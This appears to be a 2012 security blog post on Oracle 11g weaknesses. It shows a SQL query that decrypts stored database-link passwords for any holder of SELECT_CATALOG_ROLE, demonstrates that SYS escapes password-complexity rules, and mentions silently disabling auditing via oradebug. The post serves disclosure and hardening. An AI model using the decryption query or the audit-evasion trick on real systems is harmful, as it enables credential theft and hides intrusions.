Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed

SYS Security

Hello Folks,

A few people have told me that they thought only SYS could select db link passwords.
Truth is any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well.

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view;


If missing execute on dbms_crypto then may need to copy over the ciphertext to another DB under the control of the attacker.

ku$_dblink_view select from SELECT_CATALOG_ROLE is fixed in and above, as is the “stealth password cracking vulnerability” which has gained a lot of attention, and resulted in updates to John and Ettercap.

So which account would be the likely target of this stealth attack? …
The only account that is guaranteed to be present and unlocked is SYS..
For both the stealth brute force and my orabrute style brute force the primary defence is the strength of the SYS password.
If the SYS password is a 15 character passphrase that is changed regularly then the attacks are ineffective. So how to ensure SYS password is complex and the account is secure?
Problem is SYS is immune to profiles in 11g, so no password history, no account locking, and no failed logon delay and crucially no password complexity function.
The SYS password could be ‘a’ and no-one else would be the wiser.

[oracle@localhost ~]$ sqlplus sys/lowsec@localhost/orcl as sysdba

SQL*Plus: Release Production on Wed Nov 28 20:40:57 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> alter user sys identified by a;

User altered.

SQL> alter user system identified by a;
alter user system identified by a
ERROR at line 1:
ORA-28003: password verification for the specified password failed
ORA-20001: Password length less than 8

The DBA might not even realise the password is ‘a’ if they are coming in through Unix ” / as sysdba “.
SYS can even silently turn off it’s own audit through oradebug so no record of the attack either.

So SYS really is “special”, but will this improve in 12c…? Answers at UKOUG.


Leave a Reply

You must be logged in to post a comment.